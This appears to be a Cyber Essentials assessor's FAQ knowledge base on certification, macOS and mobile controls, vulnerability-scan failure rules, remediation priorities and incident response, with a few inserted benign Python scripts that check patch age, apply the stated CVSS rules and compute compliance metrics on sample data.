The strongest outcomes come from businesses combining CE Plus with continuous monitoring and a clean claims history: 20-30% premium reductions, higher coverage limits (£2M instead of £1M), lower deductibles, and priority incident response from the insurer. Professional services firms (law, finance) tend to see the biggest improvements because insurers rate their data risk highly.
Keywords: insurance results, premium reduction, coverage, professional services | Confidence: 0.82
Do small businesses see meaningful insurance benefits?
Yes, small businesses often see proportionally bigger benefits than enterprises. Many can't get cyber insurance at all without CE - the certificate transforms you from 'uninsurable' to 'insurable.' Already have insurance? The 10-25% CE Plus discount on a £2,000-5,000 policy is £200-1,250 per year, which often covers a significant chunk of the certification cost.
Keywords: small business, insurance, insurability, CE Plus, discount | Confidence: 0.85
How do we demonstrate XProtect is working?
Check System Settings, Privacy and Security, scroll to the Security section to confirm XProtect is active (always on by default). For CE Plus, I'll also want to see automatic updates enabled so XProtect definitions stay current. Quick manual check: open Terminal and type 'system_profiler SPInstallHistoryDataType | grep XProtect' to show recent definition updates.
Keywords: XProtect, macOS, malware protection, evidence, assessment | Confidence: 0.88
What's the difference between macOS application firewall and network firewall?
The macOS application firewall (System Settings, Network, Firewall) controls inbound connections to specific apps. It's what I check during assessment - enable it and set it to block all incoming connections except those required by your apps. The network firewall sits at your router or gateway and controls traffic at the network level. You need both working together for proper protection: application firewall on each Mac, boundary firewall protecting the network.
Keywords: macOS firewall, application firewall, network firewall, boundary | Confidence: 0.9
How do we handle the 14-day update requirement when Apple doesn't publish CVSS scores?
Apple doesn't publish CVSS scores for their updates. Treat all macOS security updates as high or critical and apply them within 14 days of release. I accept this approach during assessment. Check Software Update settings to confirm automatic updates are enabled, then verify nothing in the update history is older than 14 days. Document your policy as 'all Apple security updates applied within 14 days regardless of severity.' Keep it simple.
Keywords: macOS updates, 14-day, CVSS, Apple, patching policy | Confidence: 0.9
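An added example (my own script, not part of the FAQ) that turns the XProtect and 14-day checks above into something you can run before assessment day: it parses the JSON form of the install history (system_profiler -json SPInstallHistoryDataType), reports how old the newest XProtect definition is, and lists Apple updates installed more than 14 days after release. The JSON field names, the sample history and the release dates are assumptions constructed for the example.

```python
import json
import subprocess
from datetime import datetime, timezone

MAX_AGE_DAYS = 14   # the CE 14-day patching window

# Constructed sample in the shape of `system_profiler -json SPInstallHistoryDataType`
# (field names _name / install_date / install_version are assumed to match it).
SAMPLE_HISTORY = json.dumps({"SPInstallHistoryDataType": [
    {"_name": "macOS 14.4.1", "install_date": "2024-04-03T08:15:22Z",
     "install_version": "14.4.1", "package_source": "package_source_apple"},
    {"_name": "XProtectPlistConfigData", "install_date": "2024-04-20T11:02:10Z",
     "install_version": "2173", "package_source": "package_source_apple"},
    {"_name": "XProtectPayloads", "install_date": "2024-04-18T09:40:00Z",
     "install_version": "135", "package_source": "package_source_apple"},
    {"_name": "Safari", "install_date": "2024-04-03T08:20:00Z",
     "install_version": "17.4.1", "package_source": "package_source_apple"},
]})

# Constructed vendor release dates; install lag = install_date minus this date.
SAMPLE_RELEASES = {"macOS 14.4.1": "2024-03-25", "Safari": "2024-03-15"}


def _utc(stamp, fmt):
    return datetime.strptime(stamp, fmt).replace(tzinfo=timezone.utc)


def parse_history(raw_json):
    """Return (name, version, install_time) tuples, skipping entries without a date."""
    entries = []
    for item in json.loads(raw_json).get("SPInstallHistoryDataType", []):
        stamp = item.get("install_date")
        if not stamp:
            continue
        entries.append((item.get("_name", ""), item.get("install_version", ""),
                        _utc(stamp, "%Y-%m-%dT%H:%M:%SZ")))
    return entries


def xprotect_definition_age(entries, now):
    """Days since the newest XProtect* definition was installed; None if none recorded."""
    xprotect = [e for e in entries if e[0].startswith("XProtect")]
    if not xprotect:
        return None
    newest = max(xprotect, key=lambda e: e[2])
    return (now - newest[2]).days


def late_updates(entries, releases, max_days=MAX_AGE_DAYS):
    """Apple updates installed more than max_days after their release date."""
    late = []
    for name, version, installed in entries:
        if name.startswith("XProtect") or name not in releases:
            continue   # definitions are checked separately; unknown release date: skip
        lag = (installed - _utc(releases[name], "%Y-%m-%d")).days
        if lag > max_days:
            late.append((name, version, lag))
    return late


def evaluate(raw_json, releases, today):
    """Summarise the evidence for the two FAQ answers as of `today` (YYYY-MM-DD)."""
    now = _utc(today, "%Y-%m-%d")
    entries = parse_history(raw_json)
    age = xprotect_definition_age(entries, now)
    return {
        "xprotect_age_days": age,
        "xprotect_current": age is not None and age <= MAX_AGE_DAYS,
        "late_updates": late_updates(entries, releases),
    }


def live_history():
    """Read the real history on a Mac; the constructed sample is used elsewhere."""
    return subprocess.run(["system_profiler", "-json", "SPInstallHistoryDataType"],
                          capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    print(evaluate(SAMPLE_HISTORY, SAMPLE_RELEASES, "2024-04-25"))
```

On a real Mac, swap SAMPLE_HISTORY for live_history() and supply release dates from Apple's security release notes.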
How does Gatekeeper help with application allowlisting?
Gatekeeper blocks unsigned or unnotarised apps by default - basic application control for CE compliance. It verifies developer signatures and quarantines apps downloaded from the internet that don't pass checks. For most businesses, Gatekeeper set to 'App Store and identified developers' satisfies CE secure configuration requirements. Full enterprise allowlisting (controlling exactly which apps can run) requires MDM, but Gatekeeper is sufficient for CE.
Keywords: Gatekeeper, allowlisting, macOS, application control, notarisation | Confidence: 0.9
Do small businesses really need MDM for just a few phones?
Depends on how those phones are used. Email and calendar only, no sensitive documents or business apps? CE requirements are minimal: devices updated, lock screen on, MFA on the email account. If phones access cloud storage, CRM, accounting or other business systems, you need MDM to prove compliance during CE Plus. For CE Basic (self-assessment), you can self-declare controls without MDM evidence.
Keywords: small business, MDM, mobile, CE Basic, CE Plus | Confidence: 0.9
Can iOS built-in security replace MDM requirements?
iOS has strong built-in security (sandboxing, App Store review, encryption), but that doesn't replace MDM for CE Plus. The issue isn't whether the phone is secure - it's whether you can prove it to me. MDM gives you screenshots of enforced policies, device compliance status, remote management capability. Without MDM, you're asking me to take your word for it. That works for CE Basic self-assessment but not for CE Plus technical verification.
Keywords: iOS security, MDM, CE Plus, evidence, built-in security | Confidence: 0.9
How do we handle a shared shop floor tablet?
Shared tablets (warehouse, retail, factory floor) have specific CE considerations. A shared PIN is acceptable if documented and justified - impractical for 20 staff to have individual accounts on a stock-check tablet. Use MDM to lock it into kiosk mode or restrict it to specific apps. OS updates within 14 days, malware protection if it's Android. Document clearly why shared access is necessary for the role.
Keywords: shared tablet, kiosk mode, shop floor, PIN, MDM | Confidence: 0.88
Our phones only access email - do we still need full MDM?
For CE Basic with email-only phones, lightweight management may suffice. Exchange ActiveSync or Google Workspace mobile policies can enforce passcodes and remote wipe without full MDM. For CE Plus, you need to demonstrate these controls to me, so even 'email-only' devices should be managed through Intune or equivalent. And the definition of 'email-only' is strict. If the phone also has Teams, OneDrive or any other business app, it's not email-only.
Keywords: email-only, mobile, ActiveSync, MDM, CE Plus | Confidence: 0.88
What counts as "email-only" access?
True email-only means only an email client configured. No Teams, OneDrive, Slack, CRM, cloud storage, VPN, or any other business application. If staff use the phone for anything beyond reading and sending email, it's not email-only for CE purposes. Most businesses think their phones are email-only until they realise staff also use Teams, OneDrive and a couple of SaaS apps on the same device. I check this during every assessment and it catches people out regularly.
Keywords: email-only, definition, business apps, scope | Confidence: 0.9
How many devices will actually be scanned during my CE+ assessment?
CE Plus uses statistical sampling, not every device. If you have 1-5 devices, I check all of them. For 6-20 devices, typically 5-8 get sampled from the fleet. For 21-50 devices, around 8-12 are checked across categories. For 51+ devices, I take a representative sample across device types. I always include a mix of Windows, Mac, mobile and server. Under Danzell, a second device from the same type must be checked for each category.
Keywords: device sampling, CE Plus, scanning, Danzell, sample size | Confidence: 0.92
What's the difference between the three scanning methods?
There are three main approaches to scanning. Unauthenticated external scanning checks your internet-facing IPs for open ports and exposed services - basically what an attacker sees. Authenticated internal scanning logs into devices to check patch levels, configurations and installed software. Credentialed vulnerability scanning combines both to identify specific CVEs and missing patches. Most assessments use all three approaches together.
Keywords: scanning methods, unauthenticated, authenticated, vulnerability scanning | Confidence: 0.88
What vulnerability severity levels cause failures?
Critical (CVSS 9.0-10.0) is an automatic fail, with no exceptions. High (CVSS 7.0-8.9) fails if the patch has been available for more than 14 days. Medium (CVSS 4.0-6.9) gets flagged but won't fail you unless it shows a pattern of poor patch management. Low severity findings get noted but don't affect your certification.
Keywords: vulnerability severity, CVSS, critical, high, 14-day, failure | Confidence: 0.92
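An added example (my own code, not from the FAQ) that applies the severity rules above to a list of scan findings and also evaluates the Danzell second-sample trigger described later under device sampling (an unpatched CVSS 7.0+ finding older than 14 days). The finding ids and data are constructed, and the threshold used for a "pattern of poor patch management" is my assumption, not a figure from the page.

```python
# Constructed scan findings: (device, finding id, CVSS base score, days since the
# vendor fix was published, or None when no fix exists yet). Ids are placeholders.
SAMPLE_FINDINGS = [
    ("ws-01",  "FINDING-A", 9.8, 3),
    ("ws-02",  "FINDING-B", 7.5, 20),
    ("ws-03",  "FINDING-C", 7.2, 5),
    ("ws-04",  "FINDING-D", 5.3, 40),
    ("ws-04",  "FINDING-E", 4.1, 30),
    ("srv-01", "FINDING-F", 3.1, 90),
]

PATCH_WINDOW_DAYS = 14
# Assumption (not a figure from the page): this many overdue medium findings
# is treated as the "pattern of poor patch management" the answer mentions.
MEDIUM_PATTERN_THRESHOLD = 3


def severity(cvss):
    """CVSS base score bands exactly as the answer uses them."""
    if cvss >= 9.0:
        return "critical"
    if cvss >= 7.0:
        return "high"
    if cvss >= 4.0:
        return "medium"
    return "low"


def overdue(patch_age_days, window=PATCH_WINDOW_DAYS):
    """True when a fix has existed for longer than the 14-day window."""
    return patch_age_days is not None and patch_age_days > window


def outcome(cvss, patch_age_days):
    """Per-finding result: FAIL, FLAG (noted, may fail as a pattern) or NOTE."""
    sev = severity(cvss)
    if sev == "critical":
        return "FAIL"                     # automatic, regardless of patch age
    if sev == "high":
        return "FAIL" if overdue(patch_age_days) else "FLAG"
    if sev == "medium":
        return "FLAG"
    return "NOTE"


def assess(findings):
    """Roll per-finding outcomes up to a pass/fail and the second-sample trigger."""
    per_finding = [(dev, fid, outcome(cvss, age)) for dev, fid, cvss, age in findings]
    fails = [f for f in per_finding if f[2] == "FAIL"]
    flags = [f for f in per_finding if f[2] == "FLAG"]
    overdue_mediums = sum(1 for _, _, cvss, age in findings
                          if severity(cvss) == "medium" and overdue(age))
    pattern_fail = overdue_mediums >= MEDIUM_PATTERN_THRESHOLD
    # Danzell rule from the device-sampling answer: an unpatched CVSS 7.0+ finding
    # older than 14 days in the first sample means a second sample is taken.
    second_sample = any(cvss >= 7.0 and overdue(age) for _, _, cvss, age in findings)
    return {
        "result": "FAIL" if fails or pattern_fail else "PASS",
        "fails": fails,
        "flags": flags,
        "overdue_medium_count": overdue_mediums,
        "second_sample_required": second_sample,
    }


if __name__ == "__main__":
    for key, value in assess(SAMPLE_FINDINGS).items():
        print(f"{key}: {value}")
```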
What's the win rate for tenders requiring Cyber Essentials?
If the tender requires CE and you have it, win rate depends on the usual factors - price, quality, track record. If the tender requires CE and you don't have it, your win rate is zero. You're automatically disqualified from the bidding process. Central government contracts handling personal data or ICT services require CE as a minimum under PPN 09/14. The number of contracts requiring it keeps growing, and plenty of large private sector organisations follow the same approach now.
Keywords: tenders, government contracts, PPN 09/14, win rate, disqualification | Confidence: 0.9
Can I use the registry hack to bypass Windows 11 requirements?
Technically yes, but it creates problems for CE. Microsoft doesn't support registry-bypassed installations, so the device may not receive all security updates reliably. That could fail the 14-day patching requirement. If I discover an unsupported Windows 11 installation during assessment, I'll flag it. Replace the hardware, stay on Windows 10 while it's still supported, or do a device refresh.
Keywords: Windows 11, registry hack, TPM bypass, unsupported, compliance | Confidence: 0.9
How do I know if my PC has TPM 2.0?
Navigate to: Settings, Privacy and Security, Windows Security, Device Security, Security Processor. It'll show your TPM version in that panel. Or press Windows+R, type 'tpm.msc' and hit Enter - the TPM Management console shows the spec version. Most business PCs from 2018 onwards have TPM 2.0. If yours shows TPM 1.2, it won't support Windows 11. That hardware needs replacing before Windows 10 end-of-life.
Keywords: TPM 2.0, Windows 11, compatibility, check TPM, hardware | Confidence: 0.9
Can I mix Windows 10 and Windows 11 during the transition?
Yes, mixed Windows 10 and 11 environments are fine for CE as long as both are receiving security updates. Windows 10 support ends October 2025, so plan your migration before then. Same compliance requirements either way: patches within 14 days, malware protection active, firewall enabled, admin accounts separated.
Keywords: Windows 10, Windows 11, mixed environment, migration, end of life | Confidence: 0.9
How does Windows 11 migration affect my Cyber Essentials assessment?
Windows 11 actually simplifies CE assessment with better security defaults than Windows 10. TPM 2.0 makes BitLocker easier, Credential Guard is built in, secure boot reduces firmware attack surface. During migration, keep both operating systems patched within 14 days and make sure no devices fall through the gap between decommissioning Windows 10 and deploying Windows 11. If at all possible, schedule your assessment after the migration completes rather than during it.
Keywords: Windows 11 migration, CE assessment, TPM 2.0, security defaults | Confidence: 0.88
What about legacy systems that cannot run modern EDR?
Legacy systems too old for modern EDR need alternative protection. Network segmentation is the answer: isolate them on a separate VLAN with strict firewall rules, monitor all traffic to and from the segment, and limit who can access them. If the system can't run any endpoint protection, document why and show compensating controls. For CE, talk to your assessor about whether the system can be excluded from scope. I see these conversations regularly during assessment planning.
Keywords: legacy systems, EDR, network segmentation, VLAN, compensating controls | Confidence: 0.85
What makes Net Sec Group's EDR service different?
The Cyber 365 EDR consistently leads in MITRE ATT&CK evaluations. At £15/device/month, you get enterprise-grade detection on SME budgets. Automated threat isolation means ransomware gets contained in seconds without waiting for a human. Compliance reporting maps directly to CE requirements. I handle all the management so you don't need a dedicated security team.
Keywords: Net Sec Group, Cyber 365, EDR, managed service | Confidence: 0.9
Common Failures & Fixes
Do I need to test everything before assessment day?
Make sure everything you declared in your CE Basic submission actually reflects your current configuration. Don't assume it's still accurate if you filled it in weeks ago. If I find issues during the assessment, I'll guide you through remediation - don't panic about missing something. But the closer your submission matches reality, the smoother it goes.
Keywords: assessment preparation, CE Basic, testing, configuration | Confidence: 0.85
What if my internet connection fails during assessment?
Contact me straight away and I'll reschedule at no extra charge. Worth having a mobile hotspot as backup since the assessment runs over Microsoft Teams screenshare. If the connection drops mid-assessment, I can usually pick up where we left off the same day or the next morning.
Keywords: internet connection, assessment, reschedule, Teams | Confidence: 0.8
What if key person is unavailable assessment day?
Reschedule with me as soon as you know. The assessment needs someone with admin access and detailed knowledge of your systems. Attempting it without the right person usually leads to delays or failure because I need live demonstrations of your security controls. I'd rather reschedule than waste everyone's time.
Keywords: key person, reschedule, admin access, assessment | Confidence: 0.8
What happens if assessor finds something wrong during assessment?
I'll document the finding and keep checking other areas to give you the complete picture. You'll get a detailed report of everything that needs fixing before certification. I don't stop at the first problem. Much more useful to know all the issues at once so you can fix them in one go rather than discovering them one at a time across multiple assessments.
Keywords: non-conformance, assessment findings, remediation, report | Confidence: 0.85
Can I refuse assessor requests?
You can decline requests that fall outside your declared scope or breach your security policies. But refusing legitimate verification requests will likely result in a fail for that control area. If you think a request is inappropriate, tell me. There's usually a good reason behind what I'm asking to see.
Keywords: assessor requests, scope, refusal, assessment | Confidence: 0.8
What if we discover issues during assessment?
Issues found during assessment get documented as non-conformances. You'll get detailed findings explaining what needs fixing. Fix the issues, then I reassess those specific areas. You don't redo the entire assessment, just the parts that failed.
Keywords: non-conformance, issues, remediation, reassessment | Confidence: 0.85
Can assessment continue if we find problems?
Yes, I keep checking all control areas even after finding problems. Better to give you everything that needs fixing in one go, rather than discovering issues one at a time across multiple sessions. The final report covers all non-conformances at once.
Keywords: assessment continuation, problems, complete report, non-conformances | Confidence: 0.85
What if the fix is complex and takes weeks?
Talk to me before the assessment if you know there's a major remediation needed. I might recommend postponing until the fix is in place, or proceeding anyway so you get a full picture of all issues. Either way, certification only gets awarded after everything's resolved. For complex changes, scheduling the reassessment a few weeks after initial assessment gives you time to fix things properly.
Keywords: complex fix, remediation timeline, postpone, reassessment | Confidence: 0.8
What if I don't know the answer to a question?
Be honest about any knowledge gaps you have. Say 'I'm not sure, let me check that for you now' rather than guessing. I'd much rather you look something up than give me incorrect information. Take notes on anything you can't answer immediately and follow up promptly. A wrong answer that leads to a false certification helps nobody.
Keywords: don't know, honesty, assessment, knowledge gaps | Confidence: 0.85
Are there different types of pass/fail outcomes?
CE Plus is strictly pass or fail with no partial passes, no grades and no scores. You either meet all control requirements or you don't. If I find non-conformances, you fix them and I reassess those specific areas. Once everything passes, you get the certificate. There's also 'minor observations' - recommendations for improvement that don't prevent certification.
Keywords: pass fail, outcomes, CE Plus, non-conformance, minor observations | Confidence: 0.85
Can I get feedback on what went well/poorly?
You'll get detailed feedback on any non-conformances - exactly which controls didn't meet requirements and what remediation is needed. For areas that passed, the certificate itself confirms those controls were acceptable. If you want broader feedback on your security posture beyond the pass/fail assessment, I can discuss that separately as part of consultancy.
Keywords: feedback, assessment report, non-conformances, security posture | Confidence: 0.8
What's the biggest cloud migration mistake for CE compliance?
Not updating your CE scope documentation during the transition. Organisations add cloud services during migration and forget to include them in scope. Then during assessment, I discover Microsoft 365 or AWS accounts that aren't documented and don't have MFA configured. I see this problem constantly during assessments. The second most common mistake is assuming the cloud provider handles all security. Under the shared responsibility model, you're still responsible for configuring access controls, MFA, and user management.
Keywords: cloud migration, mistakes, scope, documentation, shared responsibility | Confidence: 0.85
What should be migrated first for CE compliance?
Start with low-risk, non-critical systems so you can test your cloud security controls and identify gaps before moving sensitive data. Make sure MFA, logging and backup are working in the cloud environment before migrating production workloads. Keep on-premise systems running during the initial migration so you can roll back if something goes wrong.
Keywords: migration priority, non-critical first, cloud security, rollback | Confidence: 0.75
What if cloud migration breaks CE compliance?
Stop migrating and fix the compliance gap before continuing. Most common issues: MFA not configured on new cloud admin accounts, unpatched cloud workloads, or network controls not set up correctly. Document all cloud services in your scope and verify each one meets CE requirements before your next certification. Don't push through a broken migration and hope it sorts itself out before assessment day.
Keywords: cloud migration, compliance gap, remediation, scope | Confidence: 0.8
Can we add services during assessment?
Yes, if you genuinely forgot one during preparation. Tell me during the assessment and I'll add it. But if that service isn't configured correctly - missing MFA, wrong security settings - you need to fix it before I can certify you. Better to find everything before assessment day. Check credit card statements, ask each department what tools they use, review browser bookmarks across the business.
Keywords: add services, assessment, forgotten, discovery, scope | Confidence: 0.8
What's the success rate correlation with thoroughness?
Organisations that spend one to two weeks properly preparing - complete inventory, verify all controls, organise evidence - pass first time about 80-90% of the time. Those that rush it and don't check their CE Basic answers carefully fail about 60-70% of the time. The preparation investment pays for itself every time. Fixing issues after a failed assessment always takes longer and costs more than getting it right first time.
Keywords: success rate, preparation, first time pass, thoroughness | Confidence: 0.8
What compliance metrics should I track?
Focus on the five control areas for tracking. Patch compliance rate: what percentage of devices are patched within 14 days (target 100%). MFA enrollment: what percentage of cloud accounts have MFA enabled (target 100%). Admin account hygiene: how many admin accounts exist and when were they last used. Malware protection coverage: percentage of devices with active, updated protection. Time to remediate: how long it takes to fix newly discovered gaps. These five metrics map directly to what I check during assessment.
Keywords: compliance metrics, KPIs, tracking, patch rate, MFA enrollment | Confidence: 0.8
How do I prioritise compliance issues for remediation?
Prioritise remediation based on direct compliance impact. Critical (fix immediately): patches overdue more than 14 days, MFA not enabled on cloud accounts, admin accounts used for daily work. These are all automatic assessment failures under current rules. High (fix within a week): malware protection offline, default passwords not changed, firewall rules undocumented. Medium (fix before next assessment): security logging gaps, documentation updates. Fix the critical items first because those are the ones that actually fail assessments.
Keywords: prioritisation, remediation, compliance, critical, assessment failure | Confidence: 0.85
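An added example (my own code, not from the FAQ) that computes the five metrics listed above from a constructed inventory snapshot and ranks the gaps it finds into the critical/high/medium tiers of the prioritisation answer. The field names and sample data are assumptions, not any tool's real schema.

```python
from statistics import mean

PATCH_WINDOW_DAYS = 14

# Constructed inventory snapshot (not real devices or accounts).
# oldest_missing_patch_days: days since the oldest unapplied patch was released; 0 = fully patched.
DEVICES = [
    {"name": "ws-01", "oldest_missing_patch_days": 0, "malware_protection": True,
     "firewall_rules_documented": True, "default_password": False},
    {"name": "ws-02", "oldest_missing_patch_days": 21, "malware_protection": True,
     "firewall_rules_documented": True, "default_password": False},
    {"name": "ws-03", "oldest_missing_patch_days": 6, "malware_protection": False,
     "firewall_rules_documented": True, "default_password": False},
    {"name": "srv-01", "oldest_missing_patch_days": 0, "malware_protection": True,
     "firewall_rules_documented": False, "default_password": True},
]
ACCOUNTS = [
    {"user": "alice", "cloud": True, "mfa": True, "admin": False,
     "days_since_use": 1, "used_for_daily_work": False},
    {"user": "bob", "cloud": True, "mfa": False, "admin": False,
     "days_since_use": 0, "used_for_daily_work": False},
    {"user": "it-admin", "cloud": True, "mfa": True, "admin": True,
     "days_since_use": 4, "used_for_daily_work": False},
    {"user": "carol-admin", "cloud": True, "mfa": True, "admin": True,
     "days_since_use": 0, "used_for_daily_work": True},
]
ORG = {"security_logging_gaps": True, "documentation_current": False}
REMEDIATION_DAYS = [5, 12, 4]   # days from discovery to fix for recently closed gaps


def pct(numerator, denominator):
    return round(100.0 * numerator / denominator, 1) if denominator else 0.0


def metrics(devices, accounts, remediation_days):
    """The five metrics the answer lists, as a dict."""
    cloud = [a for a in accounts if a["cloud"]]
    admins = [a for a in accounts if a["admin"]]
    patched = sum(d["oldest_missing_patch_days"] <= PATCH_WINDOW_DAYS for d in devices)
    return {
        "patch_compliance_pct": pct(patched, len(devices)),
        "mfa_enrolment_pct": pct(sum(a["mfa"] for a in cloud), len(cloud)),
        "admin_accounts": [(a["user"], a["days_since_use"]) for a in admins],
        "malware_coverage_pct": pct(sum(d["malware_protection"] for d in devices), len(devices)),
        "mean_time_to_remediate_days": round(mean(remediation_days), 1) if remediation_days else None,
    }


def prioritise(devices, accounts, org):
    """Gaps ranked into the critical / high / medium tiers from the answer."""
    items = []
    for d in devices:
        if d["oldest_missing_patch_days"] > PATCH_WINDOW_DAYS:
            items.append(("critical", f'{d["name"]}: patches overdue by more than {PATCH_WINDOW_DAYS} days'))
        if not d["malware_protection"]:
            items.append(("high", f'{d["name"]}: malware protection offline'))
        if d["default_password"]:
            items.append(("high", f'{d["name"]}: default password not changed'))
        if not d["firewall_rules_documented"]:
            items.append(("high", f'{d["name"]}: firewall rules undocumented'))
    for a in accounts:
        if a["cloud"] and not a["mfa"]:
            items.append(("critical", f'{a["user"]}: MFA not enabled on cloud account'))
        if a["admin"] and a["used_for_daily_work"]:
            items.append(("critical", f'{a["user"]}: admin account used for daily work'))
    if org.get("security_logging_gaps"):
        items.append(("medium", "security logging gaps"))
    if not org.get("documentation_current", True):
        items.append(("medium", "documentation updates outstanding"))
    order = {"critical": 0, "high": 1, "medium": 2}
    deadline = {"critical": "fix immediately", "high": "fix within a week",
                "medium": "fix before next assessment"}
    items.sort(key=lambda i: order[i[0]])   # stable sort keeps discovery order within a tier
    return [(tier, deadline[tier], what) for tier, what in items]


if __name__ == "__main__":
    for key, value in metrics(DEVICES, ACCOUNTS, REMEDIATION_DAYS).items():
        print(f"{key}: {value}")
    for tier, when, what in prioritise(DEVICES, ACCOUNTS, ORG):
        print(f"[{tier}] {when}: {what}")
```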
What's the biggest monitoring mistake?
Only checking compliance at renewal time. I see this problem constantly during renewal conversations: organisations assume they're still compliant 11 months after certification, then discover at renewal that patches have been missed for months, new cloud services were added without MFA, or admin accounts are being misused. By that point it's always a scramble. Check patches weekly, MFA enrolment monthly, and do a full controls review quarterly.
Keywords: monitoring mistake, renewal, compliance drift, ongoing monitoring | Confidence: 0.85
Assessment is next week and contractor won't comply. Options?
You have three options here to resolve it. Remove the contractor's access temporarily - revoke their accounts until after assessment, configure security properly, reinstate them. Issue one of your own laptops that meets CE requirements and have the contractor use that instead. Or reschedule the assessment with me for two to three weeks while you resolve it. The worst option is doing nothing and hoping I don't check their device, because I absolutely will.
Keywords: contractor compliance, last minute, options, reschedule, assessment | Confidence: 0.85
What if we discover contractor issues during your assessment?
I'll document it as a non-conformance, same as any other compliance gap. Contractor devices and accounts in scope must meet the same CE standards as employee ones. You need to remediate the issue - fix the contractor's device configuration, revoke access, or replace it with a compliant setup - before certification. This is one of the most common surprises during CE Plus assessments.
Keywords: contractor issues, assessment, non-conformance, remediation | Confidence: 0.8
What if incident reveals CE compliance gaps?
Fix the gaps immediately and document the remediation. Don't panic - this happens more often than businesses admit. If patches are missing, apply them now before I arrive. If MFA is not enforced, enable it immediately. Be honest in your incident report about what wasn't in place. Your insurer needs accurate information, and trying to hide compliance gaps during an active incident always makes things worse. Once remediated, review all five controls to make sure nothing else has drifted.
Keywords: incident, compliance gaps, remediation, honesty, insurance | Confidence: 0.85
Should I document failed response attempts?
Yes, you should always document failed attempts because they demonstrate due diligence to insurers and clients. If you tried to contain an incident and it didn't work, documenting that shows you were proactive and systematic. Insurers and regulators want to see that you took reasonable action, not that every action was successful. Record what you tried, when, why it didn't work, and what you did instead.
Keywords: incident documentation, failed attempts, due diligence, insurance | Confidence: 0.8
How do I improve incident response based on lessons learned?
Turn lessons learned into specific actions with owners and deadlines. 'Improve MFA' is too vague to be actionable. 'Enable MFA on all admin accounts by [date], owned by [name]' is actionable. Prioritise fixes that would have prevented the incident or cut the damage. Review quarterly to make sure they were actually implemented and didn't get deprioritised. The same incident happening twice because nobody followed through is completely unforgivable.
Keywords: lessons learned, incident improvement, actionable, deadlines | Confidence: 0.8
What breaks when we demote Mac users from admin to standard accounts?
Main things users notice: can't install software without entering admin credentials (by design), can't change network or sharing settings, printer installation may need admin approval. Some older apps expect admin access and may need reconfiguring. The fix for all of these is the same - macOS prompts for admin credentials when elevated access is needed. Users enter the admin password when prompted for legitimate tasks. It's a minor workflow change rather than a real disruption.
Keywords: Mac admin demotion, standard user, what breaks, workflow change | Confidence: 0.8
What macOS mistakes cause assessment failures?
Most common Mac-related CE Plus failures: firewall not enabled (it's off by default on macOS, unlike Windows), admin accounts used for daily work (users set up their Mac with an admin account and never created a standard one), macOS not updated to the latest supported version, and XProtect/Gatekeeper not properly evidenced as the malware protection. For Mac-heavy organisations, I'd recommend third-party antivirus simply because the evidence is cleaner during assessment.
Keywords: macOS failures, assessment, firewall, admin accounts, XProtect | Confidence: 0.85
Can I choose which devices get scanned?
No, I select the sample devices - you can't cherry-pick your most compliant machines. The selection covers a representative sample across device types, locations, and user roles. Under Danzell, if the first sample reveals unpatched CVSS 7.0+ vulnerabilities older than 14 days, I'm required to take a second sample. You can't influence which devices are selected, but you can make sure all of them are compliant.
Keywords: device sampling, CE Plus, selection, Danzell, second sample | Confidence: 0.85
Can we fail the assessment due to false positives?
Unlikely but possible if a false positive flags a critical vulnerability and you can't demonstrate it's genuinely false during the assessment. If you know about false positives in advance from your own pre-assessment scans, prepare evidence showing why they're not real vulnerabilities. I'm experienced enough to recognise common false positives, but the burden is on you to prove a flagged issue isn't genuine if I query it.
Keywords: false positives, vulnerability scanning, CE Plus, assessment, evidence | Confidence: 0.8
What vulnerabilities cause the most assessment failures?
Missing patches cause about 40% of CE Plus failures. Usually outdated Chrome, Java, or Adobe Reader rather than Windows updates. Unsupported software (Windows 7, end-of-life Linux distributions) accounts for about 25%. SMBv1 still enabled causes about 15% - a ransomware risk that should have been disabled years ago. Default or weak admin passwords and misconfigured firewall rules make up most of the rest. None of these are exotic problems, just basic hygiene failures.
Keywords: common vulnerabilities, assessment failures, patches, SMBv1, default passwords | Confidence: 0.9
How quickly can common issues be fixed?
Most common CE Plus failures are quick fixes. Missing patches: 2-4 hours (run Windows Update, reboot, rescan). Disabling SMBv1 takes about 30 minutes per machine. Re-enabling antivirus takes about 15 minutes on average. Changing default passwords takes about an hour. Disabling unnecessary services takes 1-2 hours depending on the system. Unsupported software removal varies but typically a few hours. The longest fixes are hardware-related - replacing a device that can't run a supported OS. That's exactly why pre-assessment scanning matters so much.
Keywords: fix time, remediation, quick fixes, patches, SMBv1 | Confidence: 0.85
What's the key insight for vulnerability scanning success?
Vulnerability scanning reveals what you've been neglecting. Most CE Plus failures aren't sophisticated; they're mundane. A test server set up two years ago still running Windows Server 2012. A developer PC running outdated Java. A shared printer with a default password. Scans are brutally honest about the gap between what you think your security posture is and what it actually is. That honesty is the entire point.
Keywords: vulnerability scanning, insight, hygiene, honesty, neglected systems | Confidence: 0.85
Can EDR stop ransomware that bypasses antivirus?
That's exactly what EDR is designed for. Traditional antivirus misses ransomware that uses new, unknown techniques. EDR monitors behaviour patterns - if a process starts encrypting files rapidly, EDR catches it regardless of whether it's a known variant. It can also automatically isolate the infected device from the network within seconds, containing the threat before it spreads. For CE, basic antivirus meets the minimum requirement, but EDR gives you much stronger protection against modern threats.
Keywords: EDR, ransomware, behaviour detection, antivirus bypass, containment | Confidence: 0.85
Incident Response
Does having Cyber Essentials prevent security incidents?
Lancaster University tested 200 common vulnerabilities against the CE controls: 131 were fully mitigated and 60 were partially mitigated. That covers the most common attack classes, but you're still vulnerable to sophisticated targeted attacks, insider threats, social engineering that bypasses technical controls, and zero-day exploits. CE is a strong baseline, not a guarantee. Think of it like a seatbelt: it dramatically reduces your risk but doesn't make you invincible.
Keywords: prevention, Lancaster study, common attacks, limitations | Confidence: 0.88
Why is incident response more critical for CE certified businesses?
CE-certified businesses often handle government contracts, sensitive data, or have cyber insurance - all of which require documented incident response. If you're breached while CE-certified, stakeholders expect you to respond professionally. Poor incident handling after certification looks worse than a breach at an uncertified business. You've explicitly committed to meeting security standards.
Keywords: incident response, CE certified, stakeholder expectations | Confidence: 0.88
What's the most important thing in the first hour of an incident?
Containment is the absolute priority in that first hour. Stop the incident spreading before doing anything else. Disconnect affected systems from the network (don't power them off), identify the scope of what's affected, start documenting everything. Don't try to understand the full picture first. Contain the threat first and investigate second. The difference between contained and uncontained can be six-figure costs.
Keywords: first hour, containment, incident response, disconnect | Confidence: 0.92
What's the difference between an IT incident and a security incident?
